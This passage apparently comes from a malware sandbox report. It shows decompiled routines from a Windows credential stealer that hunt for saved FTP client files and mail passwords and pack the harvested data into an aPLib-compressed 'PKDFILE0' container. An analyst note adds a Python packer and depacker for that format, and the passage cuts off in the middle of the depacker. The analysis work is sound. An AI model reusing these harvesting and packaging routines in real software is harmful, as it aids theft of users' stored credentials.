                                                                    									__eflags =  *_t83;
                                                                    									if( *_t83 != 0) {
                                                                    										continue;
                                                                    									}
                                                                    									goto L24;
                                                                    								}
                                                                    								_t62 = StrStrIA(_t59, 0x416baa);
                                                                    								__eflags = _t62;
                                                                    								if(_t62 != 0) {
                                                                    									_t84 = _t62 + 1;
                                                                    									_v28 = _t84;
                                                                    									_t65 = StrStrA(_t84, 0x416bac);
                                                                    									__eflags = _t65;
                                                                    									if(_t65 != 0) {
                                                                    										 *_t65 = 0;
                                                                    										_push(_t65);
                                                                    										_push( *_t65);
                                                                    										_push(_v28);
                                                                    										L0041066A();
                                                                    										_t66 = _t65;
                                                                    										__eflags = _t66;
                                                                    										if(_t66 != 0) {
                                                                    											_v32 = _t66;
                                                                    											_v36 = E00402A1D(_t66, _v28);
                                                                    											_t69 = E00402B0D(_v36, _v32);
                                                                    											__eflags = _t69;
                                                                    											if(_t69 != 0) {
                                                                    												_v32 = _v32 >> 1;
                                                                    												 *_t26 =  *0x416ba2;
                                                                    												 *_t27 =  *0x416ba6;
                                                                    												_t74 = E004043DC(_v36,  &_v32,  &_v48);
                                                                    												__eflags = _t74;
                                                                    												if(_t74 != 0) {
                                                                    													E004015CB(E00401569(_a4, 0xbeef0001), _a4, _v28);
                                                                    													E0040159F(_a4, _v36, _v32);
                                                                    												}
                                                                    											}
                                                                    											E004018B8(_v36);
                                                                    										}
                                                                    										_pop(_t82);
                                                                    										_pop(_t67);
                                                                    										 *_t67 = _t82;
                                                                    										continue;
                                                                    									}
                                                                    								} else {
                                                                    								}
                                                                    							}
                                                                    							break;
                                                                    						}
                                                                    						L24:
                                                                    						E00401569(_a4, 0xbeef0002);
                                                                    						E0040159F(_a4, _v12, _v8);
                                                                    						E004018B8(_v24);
                                                                    						return E00402091( &_v20);
                                                                    					}
                                                                    					return _t48;
                                                                    				} else {
                                                                    					return _t45;
                                                                    				}
                                                                    			}



























                                                                    [Per-line instruction offset column for E0040E63A: entries range from 0x0040e64a to 0x0040e7c6, with 0x00000000 entries interspersed]

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: <POP3_Password2
                                                                    • API String ID: 0-2923094552
                                                                    • Opcode ID: f4dd957d2602c25f07d23ec95ea5155f997cdfa01a96e34ce4226c6535aa6aad
                                                                    • Instruction ID: 81c7923d4842b803ad45ce7413c013c6613b7a06965b9ff00af2c8356a2977a1
                                                                    • Opcode Fuzzy Hash: f4dd957d2602c25f07d23ec95ea5155f997cdfa01a96e34ce4226c6535aa6aad
                                                                    • Instruction Fuzzy Hash: 7C416031900019BEDF12ABA2DC01CEEBE76EF58354B144837F501B61A1D77A4E61EBA9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 80%
                                                                    			E0040CD6B(char* _a4, short* _a8, intOrPtr _a12) {
                                                                    				unsigned int _v8;
                                                                    				char* _v12;
                                                                    				int _v16;
                                                                    				int _t24;
                                                                    				char* _t28;
                                                                    				char* _t29;
                                                                    				char* _t30;
                                                                    				char* _t37;
                                                                    				void* _t38;
                                                                    				void* _t39;
                                                                    				int _t40;
                                                                    
                                                                    				_v12 = 0;
                                                                    				_v16 = 0;
                                                                    				_push(_a12);
                                                                    				_pop( *_t4);
                                                                    				_v8 = _v8 >> 1;
                                                                    				_t24 = WideCharToMultiByte(0, 0, _a8, _v8, 0, 0, 0, 0);
                                                                    				if(_t24 != 0) {
                                                                    					_v12 = E004018CF(_t24);
                                                                    					_t40 = _t24;
                                                                    					if(WideCharToMultiByte(0, 0, _a8, _v8, _v12, _t40, 0, 0) == 0) {
                                                                    						E004018B8(_v12);
                                                                    						_v12 = 0;
                                                                    					}
                                                                    				}
                                                                    				if(_v12 == 0) {
                                                                    					L12:
                                                                    					E004018B8(_v12);
                                                                    					return _v16;
                                                                    				} else {
                                                                    					_t28 = StrStrIA(_v12, _a4);
                                                                    					if(_t28 == 0) {
                                                                    						goto L12;
                                                                    					}
                                                                    					_push(_t28);
                                                                    					_push(_a4);
                                                                    					L0041066A();
                                                                    					_pop(_t38);
                                                                    					_t29 = _t28 + _t38;
                                                                    					_t37 = _t29;
                                                                    					while( *_t29 != 0) {
                                                                    						if( *_t29 != 0xd) {
                                                                    							_t29 = _t29 + 1;
                                                                    							continue;
                                                                    						}
                                                                    						 *_t29 = 0;
                                                                    						_push(_t37);
                                                                    						L0041066A();
                                                                    						_t30 = _t29;
                                                                    						if(_t30 != 0) {
                                                                    							_v16 = E004018CF(_t30);
                                                                    							_t39 = _t30;
                                                                    							E00401906(_t37, _v16, _t39);
                                                                    						}
                                                                    						goto L12;
                                                                    					}
                                                                    					goto L12;
                                                                    				}
                                                                    			}














                                                                    [Per-line instruction offset column for E0040CD6B: entries range from 0x0040cd72 to 0x0040ce3a, with 0x00000000 entries interspersed]

                                                                    APIs
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CD9B
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 0040CDC1
                                                                    • StrStrIA.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CDE5
                                                                    • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CE07
                                                                      • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                                    • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CDF2
                                                                      • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ByteCharLocalMultiWidelstrlen$AllocFree
                                                                    • String ID:
                                                                    • API String ID: 1890766102-0
                                                                    • Opcode ID: 4f3b149ad33d62d62555ab3cbe58e7cbe2c327d390151b697859a92122870a5f
                                                                    • Instruction ID: 41b9c1d827694c45b055be9885e390ab78c4181ca929fd9b4fad9bc2efccc836
                                                                    • Opcode Fuzzy Hash: 4f3b149ad33d62d62555ab3cbe58e7cbe2c327d390151b697859a92122870a5f
                                                                    • Instruction Fuzzy Hash: 2E214271D44208FEEF116BA1CC46F9E7F76EF04314F20456AB110B91E1D7B95A90DB68
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 90%
                                                                    			E00405BC0(void* __ebx, void* __ecx, intOrPtr _a4) {
                                                                    				intOrPtr _v8;
                                                                    				void* __edi;
                                                                    				char* _t9;
                                                                    				char* _t11;
                                                                    				void* _t20;
                                                                    				void* _t21;
                                                                    				char* _t22;
                                                                    				char* _t23;
                                                                    
                                                                    				_t21 = __ecx;
                                                                    				_t20 = __ebx;
                                                                    				_v8 = E004015F0(_a4, 7, 0);
                                                                    				_t23 =  *0x4147ed; // 0x640b38
                                                                    				_t22 =  *0x4147f1; // 0x645e80
                                                                    				if( *_t22 != 0) {
                                                                    					do {
                                                                    						_t9 = StrStrIA(_t22, "FTP Navigator");
                                                                    						_t25 = _t9;
                                                                    						if(_t9 != 0) {
                                                                    							E00404351(_a4, E0040242B(_t25, _t23), "ftplist.txt", 0xbeef0000);
                                                                    							E004018B8(_t17);
                                                                    						}
                                                                    						_t11 = StrStrIA(_t22, "FTP Commander");
                                                                    						_t26 = _t11;
                                                                    						if(_t11 != 0) {
                                                                    							E00404351(_a4, E0040242B(_t26, _t23), "ftplist.txt", 0xbeef0000);
                                                                    							E004018B8(_t14);
                                                                    						}
                                                                    						while( *_t23 != 0) {
                                                                    							_t23 = _t23 + 1;
                                                                    							__eflags = _t23;
                                                                    						}
                                                                    						_t23 = _t23 + 1;
                                                                    						asm("cld");
                                                                    						_t21 = 0xffffffff;
                                                                    						asm("repne scasb");
                                                                    						_t28 =  *_t22;
                                                                    					} while ( *_t22 != 0);
                                                                    				}
                                                                    				return E00401636(_t20, _t21, _t22, _t28, _a4, _v8);
                                                                    			}

                                                                    APIs
                                                                    • StrStrIA.SHLWAPI(00645E80,FTP Navigator), ref: 00405BEE
                                                                    • StrStrIA.SHLWAPI(00645E80,FTP Commander,00645E80,FTP Navigator), ref: 00405C1C
                                                                      • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                                      • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                                      • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                                      • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                                      • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlen$FreeLocal
                                                                    • String ID: FTP Commander$FTP Navigator$ftplist.txt
                                                                    • API String ID: 1884169789-2424314702
                                                                    • Opcode ID: d501a6024a88707594d1eb9d2829bcb1643201a2086780d712ba321ce2283e76
                                                                    • Instruction ID: 36e39a21a9329dbe8d23580b16dfc1acef3c6298e5863b6ab1a3678991a917a5
                                                                    • Opcode Fuzzy Hash: d501a6024a88707594d1eb9d2829bcb1643201a2086780d712ba321ce2283e76
                                                                    • Instruction Fuzzy Hash: 1401C870504511FAEB1136228C02FEF3E5ADB82354F24413BB854751E6D77C5FC29AAC
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 91%
                                                                    			E0040CFF0(void* __ebx, void* __ecx, intOrPtr _a4) {
                                                                    				intOrPtr _v8;
                                                                    				void* __edi;
                                                                    				char* _t8;
                                                                    				void* _t17;
                                                                    				void* _t18;
                                                                    				char* _t19;
                                                                    
                                                                    				_t18 = __ecx;
                                                                    				_t17 = __ebx;
                                                                    				_v8 = E004015F0(_a4, 0x46, 0);
                                                                    				_t19 =  *0x4147ed; // 0x640b38
                                                                    				if( *_t19 == 0) {
                                                                    					L7:
                                                                    					return E00401636(_t17, _t18, _t19, _t23, _a4, _v8);
                                                                    				} else {
                                                                    					goto L1;
                                                                    				}
                                                                    				do {
                                                                    					L1:
                                                                    					_t8 = StrStrIA(_t19, "FTPNow");
                                                                    					_t21 = _t8;
                                                                    					if(_t8 == 0) {
                                                                    						__eflags = StrStrIA(_t19, "FTP Now");
                                                                    						if(__eflags == 0) {
                                                                    							goto L6;
                                                                    						}
                                                                    						L4:
                                                                    						_t14 = E0040242B(_t21, _t19);
                                                                    						if(E0040242B(_t21, _t19) != 0) {
                                                                    							E00404351(_a4, _t14, "sites.xml", 0xbeef0000);
                                                                    							E004018B8(_t14);
                                                                    						}
                                                                    						goto L6;
                                                                    					}
                                                                    					goto L4;
                                                                    					L6:
                                                                    					asm("cld");
                                                                    					_t18 = 0xffffffff;
                                                                    					asm("repne scasb");
                                                                    					_t23 =  *_t19;
                                                                    				} while ( *_t19 != 0);
                                                                    				goto L7;
                                                                    			}

                                                                    APIs
                                                                    • StrStrIA.SHLWAPI(00640B38,FTPNow), ref: 0040D017
                                                                    • StrStrIA.SHLWAPI(00640B38,FTP Now,00640B38,FTPNow), ref: 0040D028
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: FTP Now$FTPNow$sites.xml
                                                                    • API String ID: 0-284577462
                                                                    • Opcode ID: fe4c2ac575d338e4399085464dc42a8b401bee19fcd63c00be131e2c53f39f8e
                                                                    • Instruction ID: ec990e8c8fde0540a055802f0a5bafa42fe6efae90b5ffc829ae8747faa2dcf0
                                                                    • Opcode Fuzzy Hash: fe4c2ac575d338e4399085464dc42a8b401bee19fcd63c00be131e2c53f39f8e
                                                                    • Instruction Fuzzy Hash: 04F08670900101B5DB3136758C42FAF3A999B8275CF14413BB928B11E6E6BCCEC692AD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 85%
                                                                    			E00408293(void* _a4, signed int _a8, short* _a12, signed int _a16) {
                                                                    				char _v20;
                                                                    				char _v28;
                                                                    				void _v36;
                                                                    				void _v60;
                                                                    				void* _v64;
                                                                    				intOrPtr _v68;
                                                                    				signed int _t50;
                                                                    				signed int _t54;
                                                                    				void* _t57;
                                                                    				void* _t63;
                                                                    				signed int _t77;
                                                                    				int _t79;
                                                                    				char* _t84;
                                                                    				int _t99;
                                                                    				unsigned int _t119;
                                                                    				unsigned int _t120;
                                                                    				void* _t123;
                                                                    				void* _t126;
                                                                    				short* _t128;
                                                                    				int _t130;
                                                                    
                                                                    				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                    					return 0;
                                                                    				} else {
                                                                    					_t50 = _a8 & 0x00000007;
                                                                    					if(_a8 == 0 || _t50 != 0) {
                                                                    						return 0;
                                                                    					} else {
                                                                    						_t54 = _a16 & 0x00000007;
                                                                    						if(_a16 == 0 || _t54 != 0) {
                                                                    							return 0;
                                                                    						} else {
                                                                    							_t84 = 0;
                                                                    							_push(_a8);
                                                                    							_pop( *_t10);
                                                                    							_v68 = _v68 + 0xb;
                                                                    							_t57 = E004018CF(_v68);
                                                                    							asm("cld");
                                                                    							_v64 = _t57;
                                                                    							memcpy(_v64, 0x415d0a, 0xb);
                                                                    							memcpy(0x415d20, _a4, _a8);
                                                                    							E00402497(0, _v64, _v68,  &_v20);
                                                                    							E004018B8(_v64);
                                                                    							_push(_a8);
                                                                    							_pop( *_t23);
                                                                    							_v68 = _v68 + 0x1b;
                                                                    							_t63 = E004018CF(_v68);
                                                                    							_v64 = _t63;
                                                                    							asm("cld");
                                                                    							_v64 = _t63;
                                                                    							_t123 =  &_v20;
                                                                    							memcpy(_v64, _t123, 0x10);
                                                                    							memcpy(_t123 + 0x20, 0x415d0a, 0xb);
                                                                    							memcpy(0x415d20, _a4, _a8);
                                                                    							E00402497(0, _v64, _v68,  &_v36);
                                                                    							E004018B8(_v64);
                                                                    							asm("cld");
                                                                    							_t126 =  &_v20;
                                                                    							memcpy( &_v60, _t126, 0x10);
                                                                    							memcpy(_t126 + 0x20,  &_v36, 8);
                                                                    							E0041274B( &_v60, 1);
                                                                    							_t128 = _a12;
                                                                    							_t119 = _a16 >> 3;
                                                                    							if(_t119 != 0) {
                                                                    								while(1) {
                                                                    									_t120 = _t119;
                                                                    									if(_t120 == 0) {
                                                                    										break;
                                                                    									}
                                                                    									E004129F6( &_v28, _t128, _t128,  &_v28);
                                                                    									_t128 = _t128 + 8;
                                                                    									_t119 = _t120 - 1;
                                                                    								}
                                                                    								_t77 =  *(_t128 - 1) & 0x000000ff;
                                                                    								if(_t77 <= 8) {
                                                                    									_t128 = _t128 - _t77;
                                                                    								}
                                                                    								_t130 = _t128 - _a12 >> 1;
                                                                    								_t79 = WideCharToMultiByte(0, 0, _a12, _t130, 0, 0, 0, 0);
                                                                    								if(_t79 != 0) {
                                                                    									_t84 = E004018CF(_t79);
                                                                    									_t99 = _t79;
                                                                    									if(WideCharToMultiByte(0, 0, _a12, _t130, _t84, _t99, 0, 0) == 0) {
                                                                    										E004018B8(_t84);
                                                                    										_t84 = 0;
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    							return _t84;
                                                                    						}
                                                                    					}
                                                                    				}
			}

                                                                    APIs
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000001,?,?,0000001B), ref: 004083EB
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040840C
                                                                      • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
• Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$FreeLocal
                                                                    • String ID: ]A$]A
                                                                    • API String ID: 2558778219-3231057216
                                                                    • Opcode ID: 286f599ee0104cdff65b136c5913ff6fd88c7d42950f5473b72151dfc2a1154f
                                                                    • Instruction ID: b5c686e66aa75bb0ea5c3a45f9d24023e4dde9a45453e9509f1690b0b28c1787
                                                                    • Opcode Fuzzy Hash: 286f599ee0104cdff65b136c5913ff6fd88c7d42950f5473b72151dfc2a1154f
                                                                    • Instruction Fuzzy Hash: 6F518F72A00219AFEF10AE65EC45BDF7BA5FB80314F00843AF950B72D1DBB99D10DA58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 87%
                                                                    			E0040C587(void* __eax, void* __ebx, void* __ecx, void* __edi, intOrPtr _a4, char* _a8) {
                                                                    				short* _v8;
                                                                    				int _v12;
                                                                    				void* _v16;
                                                                    				char _v20;
                                                                    				intOrPtr _v24;
                                                                    				intOrPtr _v28;
                                                                    				intOrPtr _t37;
                                                                    				intOrPtr _t42;
                                                                    				intOrPtr _t47;
                                                                    				void* _t51;
                                                                    				void* _t52;
                                                                    
                                                                    				_t52 = __ecx;
                                                                    				_t51 = __ebx;
                                                                    				if( *0x414afb != 0) {
                                                                    					_v12 = MultiByteToWideChar(0, 0, _a8, 0xffffffff, 0, 0);
                                                                    					_v8 = E004018CF(_v12);
                                                                    					MultiByteToWideChar(0, 0, _a8, 0xffffffff, _v8, _v12);
                                                                    					_t37 =  *0x414afb(_v8, 0, 0x12, 0, 0,  &_v16);
                                                                    					__eflags = _t37;
                                                                    					if(_t37 >= 0) {
                                                                    						_t54 =  *_v16;
                                                                    						__eflags =  *((intOrPtr*)( *_v16 + 0x10))(_v16, L"Settings", 0, 0x12, 0,  &_v20);
                                                                    						if(__eflags >= 0) {
                                                                    							_t42 = E00401082(_t40, __edi, __eflags, _v20);
                                                                    							_v28 = _t42;
                                                                    							_t43 = _t42;
                                                                    							__eflags = _t42;
                                                                    							if(__eflags != 0) {
                                                                    								_v24 = E004018CF(_v28);
                                                                    								_push(_v20);
                                                                    								_t47 = E00401133(E004012BB(_t45, __eflags), __eflags, _v20, _v24, _v28);
                                                                    								__eflags = _t47;
                                                                    								if(_t47 != 0) {
                                                                    									E00401569(_a4, 0xbeef0000);
                                                                    									E0040159F(_a4, _v24, _v28);
                                                                    								}
                                                                    								_t43 = E004018B8(_v24);
                                                                    							}
                                                                    							E00401021(_t43, _t51, _t52, _t54, __eflags, _v20);
                                                                    						}
                                                                    						 *((intOrPtr*)( *_v16 + 8))(_v16);
                                                                    					}
                                                                    					return E004018B8(_v8);
                                                                    				} else {
                                                                    					return __eax;
                                                                    				}
			}

                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C5A7
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C5C9
                                                                    • StgOpenStorage.OLE32(?,00000000,00000012,00000000,00000000,?,00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?), ref: 0040C5DD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
• Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$OpenStorage
                                                                    • String ID: Settings
                                                                    • API String ID: 2489594185-473154195
                                                                    • Opcode ID: 6a5d9ff359ebca6df1bfba1a1f3bb88f09d5ea77f9709e3dbdcf255383de8aa2
                                                                    • Instruction ID: 45371d5192e4b28a761186b6385347240049983ed8c7a30cfb32e2f7b06d0ba5
                                                                    • Opcode Fuzzy Hash: 6a5d9ff359ebca6df1bfba1a1f3bb88f09d5ea77f9709e3dbdcf255383de8aa2
                                                                    • Instruction Fuzzy Hash: E431CC31A4010AFBEF11AFA1CC42F9EBB76BF04704F208676B611791F1D7759A50AB58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 82%
                                                                    			E004017D5(void* __ecx, void* __edi, intOrPtr _a4) {
                                                                    				void* _v8;
                                                                    				intOrPtr _v12;
                                                                    				intOrPtr _v16;
                                                                    				intOrPtr _v20;
                                                                    				intOrPtr _v24;
                                                                    				intOrPtr _v28;
                                                                    				void** _t27;
                                                                    				intOrPtr _t30;
                                                                    				int _t38;
                                                                    				signed int _t40;
                                                                    				signed int _t41;
                                                                    				signed int _t44;
                                                                    				signed int _t55;
                                                                    
                                                                    				_t44 = 0;
                                                                    				_t27 =  &_v8;
                                                                    				_push(_t27);
                                                                    				_push(_a4);
                                                                    				L00410790();
                                                                    				_t53 = _t27;
                                                                    				if(_t27 >= 0) {
                                                                    					_t30 = E00401082(_t27, __edi, _t53, _a4);
                                                                    					_v16 = _t30;
                                                                    					GlobalFix(_v8);
                                                                    					_t27 = _t30;
                                                                    					_t54 = _t27;
                                                                    					if(_t27 != 0) {
                                                                    						_v20 = _t27;
                                                                    						_v24 = E004018CF(E00411E92() + 0x500000);
                                                                    						_v28 = E004018CF(E00411E98(_v16) + 0x100000);
                                                                    						_v12 = E00411EA6(_v20, _v28, _v16, _v24, 0, _v16);
                                                                    						_t38 = GlobalUnWire(_v8);
                                                                    						_push(_a4);
                                                                    						E0040131F(_t38, _t54);
                                                                    						_t40 = E0040157E(_a4, "PKDFILE0YUICRYPTED0YUI1.0", 8);
                                                                    						_t41 = E00401569(_a4, _v16);
                                                                    						_t44 = _t40 & _t41 & E0040159F(_a4, _v28, _v12);
                                                                    						_t55 = _t44;
                                                                    						E004018B8(_v24);
                                                                    						_t27 = E004018B8(_v28);
                                                                    					}
                                                                    				}
                                                                    				_push(_a4);
                                                                    				E0040129A(_t27, _t55);
                                                                    				return _t44;
			}

                                                                    APIs
                                                                    • 73D83240.OLE32(?,?), ref: 004017E5
                                                                    • GlobalFix.KERNEL32 ref: 00401800
                                                                      • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                                    • GlobalUnWire.KERNEL32 ref: 0040185E
                                                                      • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                                    Strings
                                                                    • PKDFILE0YUICRYPTED0YUI1.0, xrefs: 0040186D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
• Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: GlobalLocal$AllocD83240FreeWire
                                                                    • String ID: PKDFILE0YUICRYPTED0YUI1.0
                                                                    • API String ID: 2065937090-258907703
                                                                    • Opcode ID: c4eae462b65c8d0557db90d01b8eb71803dbf67a8bd34dab7953d3abd0a8b25e
                                                                    • Instruction ID: ebbbe2b59391e3aaee2ab6b6a4edf92b2b65332d5e813d2d7ef502307b157ca4
                                                                    • Opcode Fuzzy Hash: c4eae462b65c8d0557db90d01b8eb71803dbf67a8bd34dab7953d3abd0a8b25e
                                                                    • Instruction Fuzzy Hash: E921EC72D00109BBEF017FE1CC42AAD7E76EF10344F10807ABA10751B1E77A9A609B98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%
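Analyst note and added example (this is not code from the report, from the sample, or from the leaked Pony source). Reading the decompiled E004017D5 above: the unresolved OLE32 import at 004017E5 is called with (_a4, &_v8) and bracketed by GlobalFix/GlobalUnWire on _v8, which is consistent with GetHGlobalFromStream locking a buffer behind an IStream (inferred; the report leaves the import name unresolved). E00411EA6(_v20, _v28, _v16, _v24, 0, _v16) has the argument shape of aPLib's aP_pack(source, destination, length, workmem, callback, cbparam), and E00411E92/E00411E98 are sized like its aP_workmem_size/aP_max_packed_size helpers (inferred; it agrees with the "Yara detected aPLib compressed binary" signature on this page). E0040157E is passed the string with length 8, so only "PKDFILE0" reaches the output; "YUICRYPTED0" and "YUI1.0" are adjacent constants the decompiler ran together. E00401569 then writes the unpacked length _v16 as a DWORD and E0040159F appends the _v12 packed bytes. The script below, written for this page, implements that inferred container (assumed: little-endian DWORD, nothing between magic, length and payload) on top of a from-scratch aPLib depacker and a minimal greedy packer. The depacker follows the published aPLib bit-stream format (literal, normal, short and 4-bit-offset matches, short match with offset 0 as end marker); the packer is not a port of the library's own and only emits literals and normal matches, so its output is larger than real aPLib output but any aPLib depacker accepts it. The sample bytes, the function names and the minimum match length of 4 are my choices. find_reports shows the triage use: carving every parseable "PKDFILE0" container out of a process memory dump.

```python
MAGIC = b"PKDFILE0"  # E0040157E is passed length 8, so only this prefix of the run-together string is written

def ap_pack(data: bytes) -> bytes:
    """Greedy LZ packer: literals, 'normal' matches (tag 10) and the end marker; needs >= 1 byte. Min match 4 is my choice."""
    out, tag = bytearray([data[0]]), [0, 0]          # tag = [index of current tag byte, bits left in it]
    def bit(b):                                      # tag bytes sit exactly where the depacker will fetch them
        if tag[1] == 0:
            tag[0], tag[1] = len(out), 8
            out.append(0)
        tag[1] -= 1
        out[tag[0]] |= b << tag[1]
    def gamma(v):                                    # v >= 2: MSB implicit, each bit followed by a continue flag
        for i in range(v.bit_length() - 2, -1, -1):
            bit((v >> i) & 1); bit(1 if i else 0)
    pos, lwm, n = 1, 0, len(data)
    while pos < n:
        best_len = best_off = 0
        for off in range(1, min(pos, 0xFFFF) + 1):
            m = 0
            while pos + m < n and data[pos + m] == data[pos - off + m]:   # overlapping copies are allowed
                m += 1
            if m > best_len:
                best_len, best_off = m, off
        if best_len >= 4:
            bit(1); bit(0); gamma((best_off >> 8) + (3 if lwm == 0 else 2)); out.append(best_off & 0xFF)
            gamma(best_len - (2 if best_off < 128 else (best_off >= 1280) + (best_off >= 32000)))
            pos, lwm = pos + best_len, 1
        else:
            bit(0); out.append(data[pos]); pos, lwm = pos + 1, 0
    bit(1); bit(1); bit(0); out.append(0)            # end-of-stream marker
    return bytes(out)

def ap_depack(src: bytes) -> bytes:
    """Reference aPLib decoder; a malformed or truncated stream raises ValueError or IndexError."""
    out, st = bytearray(), [0, 0, 0]                 # st = [source position, tag byte, bits left]
    def getbyte():
        st[0] += 1
        return src[st[0] - 1]
    def getbit():
        if st[2] == 0:
            st[1], st[2] = getbyte(), 8
        st[2] -= 1
        return (st[1] >> st[2]) & 1
    def getgamma():
        v = 1
        while True:
            v = (v << 1) + getbit()
            if not getbit(): return v
    def copy(off, length):
        if not 0 < off <= len(out):
            raise ValueError("back-reference outside the output window")
        for _ in range(length):
            out.append(out[-off])
    out.append(getbyte())
    r0 = lwm = 0
    while True:
        if not getbit():                             # 0: literal byte
            out.append(getbyte()); lwm = 0
        elif not getbit():                           # 10: gamma offset-high, byte offset-low, gamma length
            off = getgamma()
            if lwm == 0 and off == 2:                # special value: reuse the previous offset
                copy(r0, getgamma())
            else:
                off = ((off - (3 if lwm == 0 else 2)) << 8) + getbyte()
                copy(off, getgamma() + (off >= 32000) + (off >= 1280) + (2 if off < 128 else 0)); r0 = off
            lwm = 1
        elif not getbit():                           # 110: 7-bit offset + 1-bit length; offset 0 ends the stream
            b = getbyte()
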